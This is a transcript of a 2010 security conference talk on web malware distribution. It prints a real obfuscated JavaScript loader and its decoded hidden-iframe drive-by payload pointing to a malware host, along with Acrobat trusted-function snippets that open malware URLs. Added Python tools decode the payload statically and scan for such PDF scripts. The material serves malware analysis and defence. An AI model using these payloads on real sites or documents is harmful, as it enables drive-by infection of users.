Scaling Web 2.0 Malware Infection
Post on 19-Oct-2014
Description
Given at TRISC 2010, Grapevine, Texas. http://www.trisc.org/speakers/aditya_sood/#p
The talk sheds light on the new trends of web-based malware. Technology and insecurity go hand in hand. With the advent of new attacks and techniques, the distribution of malware through the web has increased tremendously. Browser-based exploits, mainly against Internet Explorer, have given birth to a new world of malware infection. Attackers spread malware elegantly by exploiting vulnerabilities and drive-by downloads, using infection strategies such as malware distribution through IFRAME injections and Search Engine Optimization (SEO) poisoning. To understand the intrinsic behavior of this web-based malware, a systematic analysis is required to understand the logic working behind it. It is necessary to dissect these malware samples from bottom to top in order to control their devastating behavior. The talk covers structured methodologies and demonstrates the static, dynamic and behavioral analysis of web malware, including PCAP analytics. Demonstrations will show the value and necessity of web malware analysis.
Transcript
Scaling Web 2.0 Malware Infection
Aditya K Sood, Sr. Security Practitioner
Armorize, Santa Clara, US
Disclaimer
All contents of this presentation represent my own beliefs and views and do not, unless
explicitly stated otherwise, represent the beliefs of my current or any of my previous
employers.
About Me - $whoami
• Senior Security Practitioner, Armorize
http://www.armorize.com
• Founder, SECNICHE Security
http://www.secniche.org
• Worked previously for COSEINC as Senior Security Researcher and as Security
Consultant for KPMG
• Author of written content for HITB E-Zine, Hakin9, ELSEVIER and USENIX journals
• Like to do bug hunting and malware dissection
• Released advisories to forefront companies
• Active speaker at security conferences including RSA etc.
Agenda
Understanding The Malware Anatomy
The Vertical Risk – Malware Impact on Business
Top 10+ Web Malware Infection Strategies
2X Generation - Century Malware Trickeries
Case Study – Infection through PDF Trusted Functions
Demonstration
Pattern
Understanding The Malware Anatomy
The Dependent Peripherals
Malware Mess – Global Trifecta
Malware Infection Rate
Malware Retrospective and Classification
Top 5 Malware Categories
Trojan (31.2 %)
Downloader (25.6 %)
Backdoor (13.8 %)
Spyware (13.2 %)
Adware (4.9 %)
Top 5 Virus Families
Stuh (4.4 %)
Fraudload (3.9 %)
Monder (3.6 %)
Autorun (2.7 %)
Buzus (2.7 %)
Interdependency
Malware - The Impact on Real World
Malware Trends – The Attack Base
Financial abuse and mass identity theft
The mass destructor – Botnet infection and zombie hosts
Exploiting the link dependency – Pay Per click hijacking
Traffic manipulation – Open redirect vulnerabilities at large scale
Spyware, cryptovirology, ransomware etc.
Distributed Denial of Service – the service death game, extortion
Industry change semantics – Malware activation change line
Infection through browsers and portable gadgets – the biggest step
Exploiting anti virus loopholes
Malware Contributing Issues – Rising Steps
Publicly available malware source code
Malware distribution frameworks such as MPACK, NeoSploit etc.
Unpatched vulnerabilities and loosely coupled patches
Demand of underground services and self exposure
Global surveillance mode and information stealing in the wild
Software discrepancies and inherited design flaws such as Browsers.
Exploitation at web level is easy. It opens a door to System Level Fallacies.
Inappropriate security solutions deployed and irrelevant security paradigm
Botnet Infection – The easy way to launch diversified attack
Web sharing and centralized work functionality.
Pattern
Understanding The Vertical Risk
Web Delivered Malware Impact on Business
Underground Market and Malware Flow Model
Underground Malware Market Business - Statistics
© GDATA
Practical Malware Flow Model
© Reihe Informatik. TR-2007-011
Malware Writers Role
Flow of Malware Websites
Malware - The Impact on Real World
Pattern
Malware – Sources of Infection
Web 2.0
Top 10 + Strategies of Distributing Malware through Web
Long Live Drive By Download – Base Web Malware Tactic
(SEO) Poisoning – Driven with Malware
Messengers – Infection at Instant State
Networking Websites – TWITTER Malware Infection
Exploiting the trust relationship on Social Networking Websites
Spreading malware content through Tweets, Scraps etc.
Chain Reaction – Dwells very fast in Website Networks (URL Shortening Trick)
Social Networking – FACEBOOK Malware Applications
Manipulating the Open API Calls
User centric control
Exploiting the design fallacies
Social Networking – FACEBOOK MAIL Infection
Step 1
Step 2
Step 3
Online Media Content – YouTube, Google Videos etc.
Exploiting the Web of Trust – Human Touch
Spyware, ransomware and other variants etc.
Insidious spamming – email, blogs, redirectors etc.
Botnets – Malware Infection at Large Scale
Direct Malware Hosting – Infected Web Domains
System Stringency – Exploiting the Exceptions
Malware Kits – Automated Infection
Case Study – Safety Labs Malware Infection
Malware infecting the security service provider's own website.
It is unfortunate that even a security solution provider is touched by the latest Internet IFRAME
threats, or rather infections.
Thousands of websites on the Internet have been compromised with malicious IFRAMEs which load exploit
code designed to silently install trojans onto susceptible victim computers.
Case Study – Safety Labs Malware Infection
Obfuscated JavaScript (keywords are shown in their original case; the letter case of the encoded payload string is not preserved in this transcript)
<script language=javascript>
function mdban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,9,52,47,48,11,7,35,59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34,0,58,40,31,60,49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42);
for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(221^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}
mdban('ZT8MVN@ZT8UZFKNZYQYUVN8M9Z3VVN@3DQ5YTKCFZUNSPAXDC6AS8UN34AX0TI5M9QAC0LUYD8C@UQU0LKUZSIYFI8I@2Z@@TE8M8N@FPN39CXHGFKUST0ZMDAXYLY13PL8F3I8MVN5MLE0DMXICGRADF@HC0LUYCX3U0R3Z2KXZLQY830I0LA5SCLXZJXACD8UZGW5YJ0EY2CU@GI5PXH@MTA8076YF2Y8@FQ5Y7@HD')</script><!-- 213.219.250.100 -->
Script Source is
http://www.safety-lab.com/audits/categorylist.pl?lang=en
Case Study – Safety Labs Malware Infection
Deobfuscated JavaScript
(1) Decoded JavaScript that eval() runs:
window.status = 'done';
document.write('<iframe name=5B8F src="http://3pigs.info/t/?' + Math.round(Math.random() * 14490) + '5B8F' + '" width=322 height=45 style="display:none"></iframe>')
(2) Result written by the decoded JavaScript:
<iframe name=5B8F src="http://3pigs.info/t/?58965B8F" width=322 height=45 style="display:none"></iframe>
"http://3pigs.info/t/?58965B8F" was injected as the source of the malicious file.
Decoding malicious JavaScript is always a high-complexity task.
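A static re-implementation of the decoder routine from the obfuscated script above, added here as an analysis aid and not part of the original slides: it lets an analyst recover the hidden document.write() payload without ever running the script's eval(). The lookup table and the XOR constant 221 are copied from the script; encode() is an inverse written only to produce test input, and the sample plaintext is constructed (modelled on the decoded call shown on the slide, with the real domain replaced by a placeholder).

```python
import re

# Decoder table copied from the obfuscated script (index = charCode - 48, so it spans ASCII '0'..'z').
DECODER_TABLE = [
    63, 9, 52, 47, 48, 11, 7, 35, 59, 56, 0, 0, 0, 0, 0, 0, 43, 14, 20, 5,
    61, 19, 54, 36, 15, 30, 32, 38, 22, 44, 29, 28, 12, 2, 55, 45, 51, 62, 25, 13,
    27, 3, 17, 0, 0, 0, 0, 16, 0, 34, 0, 58, 40, 31, 60, 49, 8, 50, 4, 21,
    53, 1, 10, 33, 41, 23, 24, 37, 18, 26, 57, 6, 39, 46, 42,
]
XOR_KEY = 221  # the `221 ^ ...` constant the script applies to every decoded byte
IFRAME_SRC_RE = re.compile(r'<iframe[^>]*\bsrc=["\']([^"\']+)', re.IGNORECASE)

def decode(payload: str) -> str:
    """Port of mdban() minus the eval(): 4 symbols -> 3 bytes, low bits first, each XOR 221."""
    out, w, s = [], 0, 0
    for ch in payload:
        idx = ord(ch) - 48
        if not 0 <= idx < len(DECODER_TABLE):
            raise ValueError(f"symbol {ch!r} is outside the decoder alphabet")
        w |= DECODER_TABLE[idx] << s
        if s:                       # s cycles 6 -> 4 -> 2 -> 0, emitting one byte per step
            out.append(chr(XOR_KEY ^ (w & 255)))
            w >>= 8
            s -= 2
        else:                       # first symbol of a 4-symbol group only fills the accumulator
            s = 6
    return "".join(out)

def encode(text: str) -> str:
    """Inverse of decode(); an assumption used only to build test input (not from the script)."""
    inverse = {}
    for idx, value in enumerate(DECODER_TABLE):
        ch = chr(idx + 48)          # prefer an alphanumeric symbol; unused slots also map to 0
        if value not in inverse or (ch.isalnum() and not inverse[value].isalnum()):
            inverse[value] = ch
    symbols = []
    for i in range(0, len(text), 3):
        chunk = [XOR_KEY ^ ord(c) for c in text[i:i + 3]]
        word = sum(b << (8 * k) for k, b in enumerate(chunk))
        symbols.extend(inverse[(word >> (6 * k)) & 63] for k in range(len(chunk) + 1))
    return "".join(symbols)

def find_iframe_sources(decoded: str) -> list[str]:
    """Triage helper: list iframe src values found in decoded script text."""
    return IFRAME_SRC_RE.findall(decoded)

# Constructed sample modelled on the decoded payload above (placeholder domain, not the real one).
SAMPLE_PLAINTEXT = ("window.status = 'done';"
                    "document.write('<iframe name=5B8F src=\"http://example.invalid/t/?' + "
                    "Math.round(Math.random() * 14490) + '5B8F' + '\" width=322 height=45 style=\"display:none\"></iframe>')")
```

The original script also splits its input into 1024-symbol blocks and eval()s each block separately; the port simply concatenates the decoded text, which is what an analyst wants to read.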
2X Generation Malware Trickeries
System File Patching and Code Injection
Code Interdependency – Malware Adjacency - Code Resuscitation.
Code Randomization, Obfuscation and Morphing
Rootkits and System Cloaking
Exploiting ActiveX and JavaScript Heaps – Direct Control
Private & Confidential Property of Armorize
Escaping What !
Malware Analysis Methodology (MAM) - Overview
End Point Communication Connection state check
Server identity checks through communication medium.
Error generation like Checksum Integrity.
Encrypted data in packets.
Protocol Switching.
Session Stream Analysis – Deep Inspection
Analyzing TCP stream session
Extracting an executable from the raw data
Behavioral Analysis – Scrutinizing system fallacies
Active debugging
Black Box Testing approach
Static Analysis – Reversing the facets of malware
It's all about analyzing the code of the malware
Case Study – Malware Infection
PDF Trusted Functions
(Understanding the Facets of Malware)
Some PDF Truths
Hyperlink execution is notified to the user through alerts
Data is not allowed to be stored in forms
http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf
A number of vulnerable functions have been removed, i.e. taken out of the registered state
Support for Adobe Reader 7.xx has been removed
http://blogs.adobe.com/adobereader/2009/12/adobe_reader_and_acrobat_versi.html
Other alerts have been structured as security checks in standalone PDFs
Acrobat JavaScript (Acro JS) does not support the DOM as normal browser JavaScript does.
Adobe provides built-in code wrappers that call restricted functions in specific environments. For
example, in general it is not possible to generate another PDF from a standalone PDF when it is
opened.
Understanding Malware Infection - PDF
Exploiting the browser – Downloading files through Windows Media Player
Exploiting the Global Access of JavaScript folder in PDF
A hidden gift.js file containing malicious code is placed here
Understanding Malware Infection - PDF
Calling Codes through Trusted Functions
The trusted function body calls app.beginPriv() (begin privileges) and app.endPriv() (end
privileges) to enclose any function or code that is to run as trusted.
The trusted function method can be called successfully on initialization of the
application, and through it a certain number of restricted functions can be called.
myTrustedFunction = app.trustedFunction(
    function() { <function body> }
);
New Scareware Message – Opening a new PDF
trustedDoc = app.trustedFunction(
    function (width, height) {
        app.beginPriv();
        var trustDoc = app.newDoc(width, height);
        trustDoc.addWatermarkFromText("X JERKED X");
        app.endPriv();
        return trustDoc;
    }
);
trustedDoc(300, 300);
Understanding Malware Infection - PDF
Calling Codes through Trusted Propagator Functions
myPropagatorFunction = app.trustPropagatorFunction(
    function() { <function body> }
);
URL Opening - Drive by Download Infections
trustedDoc = app.trustedFunction(
    function (cURL, bNewFrame) {
        app.beginPriv();
        var trustedDoc = app.launchURL(cURL, bNewFrame);
        app.endPriv();
        return trustedDoc;
    }
);
trustedDoc("http://www.malware1.com", true);
trustedDoc("http://www.malware2.com", true);
trustedDoc("http://www.malware3.com", true);
trustedDoc("http://www.malware4.com", true);
trustedDoc("http://www.malware5.com", true);
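An added defender-side check, not part of the slides: a scanner for folder-level Acrobat/Reader JavaScript files (the "gift.js dropped into the JavaScript folder" placement described above) that flags scripts which wrap privileged app.* calls such as app.launchURL or app.newDoc inside app.trustedFunction / app.beginPriv. The JavaScript folder path is supplied by the caller, since it varies by product and version; the sample script is constructed from the launchURL pattern on the slide with a placeholder URL.

```python
import re
from pathlib import Path

# The two halves of the abuse pattern described above. Each is legitimate on its own;
# a folder-level script that combines them deserves a closer look.
TRUST_WRAPPERS = re.compile(r"app\.(trustedFunction|trustPropagatorFunction|beginPriv)\b")
PRIVILEGED_CALLS = re.compile(r"app\.(launchURL|newDoc|openDoc|execMenuItem)\s*\(")
HARDCODED_URLS = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)

def classify_script(source: str) -> dict:
    """Return the indicators found in the text of one folder-level .js file."""
    wrappers = sorted(set(TRUST_WRAPPERS.findall(source)))
    privileged = sorted(set(PRIVILEGED_CALLS.findall(source)))
    return {
        "trust_wrappers": wrappers,
        "privileged_calls": privileged,
        "urls": HARDCODED_URLS.findall(source),
        # Flag only the combination: trusted functions by themselves are a supported feature.
        "suspicious": bool(wrappers) and bool(privileged),
    }

def scan_folder_level_scripts(root: Path) -> list:
    """Walk a JavaScript folder (path chosen by the caller) and return the suspicious files."""
    findings = []
    for js in sorted(root.rglob("*.js")):
        result = classify_script(js.read_text(errors="replace"))
        if result["suspicious"]:
            findings.append((js, result))
    return findings

# Constructed sample modelled on the launchURL snippet on the slide (placeholder URL).
SAMPLE_GIFT_JS = """
trustedDoc = app.trustedFunction(function (cURL, bNewFrame) {
    app.beginPriv();
    var d = app.launchURL(cURL, bNewFrame);
    app.endPriv();
    return d;
});
trustedDoc("http://malware-host.invalid/landing", true);
"""

if __name__ == "__main__":
    import sys
    for path, info in scan_folder_level_scripts(Path(sys.argv[1])):
        print(path, info)
```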
Understanding Malware Infection - PDF
Demonstration
Questions and Queries
Thanks and Regards
Special thanks to Armorize for pushing me to do more research.
http://www.armorize.com
__________________________________________________________________________________
Portal and Blog
SecNiche Security – http://www.secniche.org | http://zeroknock.blogspot.com
(Screenshots shared from various resources)